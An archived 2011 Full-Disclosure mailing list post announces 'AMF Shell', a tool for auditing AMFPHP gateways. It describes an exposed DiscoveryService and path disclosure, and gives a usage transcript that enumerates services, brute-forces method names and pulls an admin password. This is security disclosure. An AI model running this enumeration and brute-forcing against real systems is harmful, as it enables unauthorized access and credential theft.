lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sat, 30 Apr 2011 23:30:32 +0200
From: George Hedfors <George.Hedfors@...ercom.com>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Cc: "submissions@...ketstormsecurity.org"
	<submissions@...ketstormsecurity.org>,
	"news@...uriteam.com" <news@...uriteam.com>
Subject: Action Message Format (AMF) Shell

>>From my blog at http://george.hedfors.com/content/action-message-format-amf-shell. Please visit that url for updates

Introduction
Action Message Format (AMF) is a binary format used to serialize ActionScript objects. It is used primarily to exchange data between an Adobe Flash application and a remote service, usually over the internet.

Background
When I was auditing the security of a content management system based on Flash, I quickly realized that the information that I could dig out by hand from the binary communication wouldn't take me the whole way. Burp Suite Pro, which I was using at the time has a neat feature that decodes the serialized communication on the fly. However, it doesn't provide an adequate way to manipulate. Therefore, I started investigating into possibilities of making a tool that could in fact communicate freely with the AMF gateway using its own protocol.

After some investigation, I found PyAMF, which is a Python implementation of the AMF messaging protocol. The tool that I started making then turned into something that I'd like to call, a AMF Shell.

AMFPHP Vulnerabilities
There are a number of vulnerabilities that are standard with AMFPHP, which was the gateway software that I've constructed AMFShell around. By default, there is a so called "Service Browser" installed that allows you to to pretty much the same as my AMF Shell. It's typically installed in a path such as:

http://www.victim.com/amfphp/browser

However, most administrators are aware of this vulnerability and have removed the Flash page. What they usually haven't removed is the service files associated with it. They are typically located at:

http://www.victim.com/amfphp/services/amfphp/DiscoveryServices.php

DiscoveryService.php is the AMF class that the Service Browser calls on to do it's magic. This class can still be contacted using AMFShell for example. The vulnerability resides in the fact that the DiscoveryService class has methods that enumerates other local services and classes and returns them.

The other vulnerability in AMFPHP is that it discloses the local path in case one is trying to use a non-existent class or method. What you'll get is something like this, when trying to access a class called 'asdf':

The class {asdf} could not be found under the class path {/mnt/target03/350439/508174/www/web/content/amfphp/services/asdf.php}

Yes, I've also been investigating into the possibility of directory traversal but have so far been unsuccessful. One of the reasons is that it converts dots '.' into slashes and is not subjected to hex or any other encoding.

Available commands
brute
Launches a brute force attack for method names to the selected class using common names.
call methodName(args,..)
Call a method from the current class. Arguments
may be single arguments or arrays:
call methodName(['array','of','stuff'])
call methodName(arg1,arg2,arg3)
list
Lists available classes
use service.className
Change current class

Usage example
$ ./amfshell.py http://www.victim.com/amfphp/gateway.php
[+] AMFPHP exists and appears to be vulnerable to 'DiscoveryService'.
[*] To disable 'DiscoveryServices', remove /homepages/16/d264/htdocs/services/amfphp/DiscoveryService.php

Welcome to Action Message Formate Shell by George Hedfors. Type 'help' for command list.

(amfphp.DiscoveryService) list
amfphp.DiscoveryService
UserService
(amfphp.DiscoveryService) use UserService
(UserService) brute
This may seriously harm your environment, are you sure? (y/N): y
Testing 539 methods...
Missing argument 1 for UserService::addUser()
Missing argument 1 for UserService::getUser()
Missing argument 1 for UserService::updateUser()
(UserService) call getUser(admin)
{"username": "admin", "password": "admin123", "id": "1"}

What could possibly go wrong from here? :)

Known bugs
Some pages return HTML content instead of AMF when calling a method. This cannot be parsed by PyAMF but can easily be viewed using a sniffing tool, such as Wireshark.

George Hedfors
IT- & Information Security Consultant

Cybercom Sweden East AB
Lindhagensgatan 126   Box 30154   SE-104 25 Stockholm

Phone +46 8 726 75 00   Fax +46 8 19 33 22

http://www.cybercomgroup.com

http://george.hedfors.com/
http://www.linkedin.com/in/georgehedfors
Download attachment "amfshell-0.23.tgz" of type "application/x-compressed" (2573731 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ